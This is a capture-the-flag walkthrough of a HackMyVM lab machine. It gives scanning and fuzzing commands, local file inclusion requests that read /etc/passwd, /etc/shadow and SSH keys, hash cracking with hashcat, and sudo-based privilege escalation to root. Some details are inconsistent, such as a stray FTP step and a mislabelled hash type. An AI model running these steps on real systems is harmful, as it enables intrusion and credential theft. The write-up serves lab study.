## hackmyvm pwned
[Link CTF](https://hackmyvm.eu/machines/machine.php?vm=jabita)

1. Arp Scan to get IP

        sudo arp-scan -l -I eth1 | grep PCS
        192.168.1.195   08:00:27:22:0e:a6       PCS Systemtechnik GmbH

2. set variable ip

        ip=192.168.1.195

3. Full Scan IP with nmap

        sudo nmap -sCV -p- $ip

4.  Get info from page

        curl $ip
        curl $ip/robots.txt

5. We use FUZZ to check others path in URL 

        sudo wfuzz -c --hc=404 -t 500 -L -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u $ip/FUZZ

6. We obtain path building

        curl $ip/building  
        <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
        <html><head>
        <title>301 Moved Permanently</title>
        </head><body>
        <h1>Moved Permanently</h1>
        <p>The document has moved <a href="http://192.168.1.195/building/">here</a>.</p>
        <hr>
        <address>Apache/2.4.52 (Ubuntu) Server at 192.168.1.195 Port 80</address>
        </body></html>

7. We use FUZZ with php extensions

        sudo wfuzz -c --hc=404 -t 500 -L -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -z list,txt-php-html -u $ip/building/FUZZ.FUZ2Z 

        000000074:   200        10 L     202 W      1406 Ch     "contact - php"                                                                                                                         
        000000503:   200        4 L      30 W       219 Ch      "gallery - php"   

8. We get path /pwned.vuln and check code an get user and password ftp

9. Get info from URL

        curl -s http://192.168.1.195/building/index.php
        curl -s http://192.168.1.195/building/contact.php
        curl -s http://192.168.1.195/building/gallery.php

10. Check execute code via php

        curl -s http://192.168.1.195/building/index.php?page=whoami
        curl -s http://192.168.1.195/building/index.php?page=../../../../../../etc/passwd

11.  Get 3 system users
```
root:x:0:0:root:/root:/bin/bash
jack:x:1001:1001::/home/jack:/bin/bash
jaba:x:1002:1002::/home/jaba:/bin/bash
```
12.  check autorizxed keys and id_rsa
```
curl -s http://192.168.1.195/building/index.php?page=/home/jack/.ssh/id_rsa
curl -s http://192.168.1.195/building/index.php?page=/home/jack/.ssh/authorized_keys 
curl -s http://192.168.1.195/building/index.php?page=/home/jaba/.ssh/id_rsa
curl -s http://192.168.1.195/building/index.php?page=/home/jaba/.ssh/authorized_keys 
curl -s http://192.168.1.195/building/index.php?page=/root/.ssh/id_rsa
curl -s http://192.168.1.195/building/index.php?page=/root/.ssh/authorized_keys 
curl -s http://192.168.1.195/building/index.php?page=../../../../../../etc/shadow
```

13. Get password encripted
```
root:$y$j9T$avXO7BCR5/iCNmeaGmMSZ0$gD9m7w9/zzi1iC9XoaomnTHTp0vde7smQL1eYJ1V3u1:19240:0:99999:7:::
jack:$6$xyz$FU1GrBztUeX8krU/94RECrFbyaXNqU8VMUh3YThGCAGhlPqYCQryXBln3q2J2vggsYcTrvuDPTGsPJEpn/7U.0:19236:0:99999:7:::
jaba:$y$j9T$pWlo6WbJDbnYz6qZlM87d.$CGQnSEL8aHLlBY/4Il6jFieCPzj7wk54P8K4j/xhi/1:19240:0:99999:7:::
```
14.  check hash jack is Linux SHA256

        1800 | sha512crypt $6$, SHA512 (Unix)                             | Operating System

15. Use hashcat to desencrip
        
        echo "jack:$6$xyz$FU1GrBztUeX8krU/94RECrFbyaXNqU8VMUh3YThGCAGhlPqYCQryXBln3q2J2vggsYcTrvuDPTGsPJEpn/7U.0:19236:0:99999:7:::
" > hash
        
        hashcat -m 1800 -a 0 hash /usr/share/wordlists/rockyou.txt
        
16. Connect with user jack, find files with special permisison

        find / -perm -4000 2>/dev/null

17. Sudo elevations

        sudo -l

18. Search vulnerabilities awk https://gtfobins.github.io/

        https://gtfobins.github.io/

19. Jump tu user jaba

        sudo -u jaba awk 'BEGIN {system("script /dev/null -c bash")}'
        
20. Sudo elevations

        sudo -l

21.  Edit library '/usr/lib/python3.10/wild.py

        import os
        os.system("script /dev/null -c bash")

22. Excute the scrip an we are root now

        sudo /usr/bin/python3 /usr/bin/clean.py
        whoami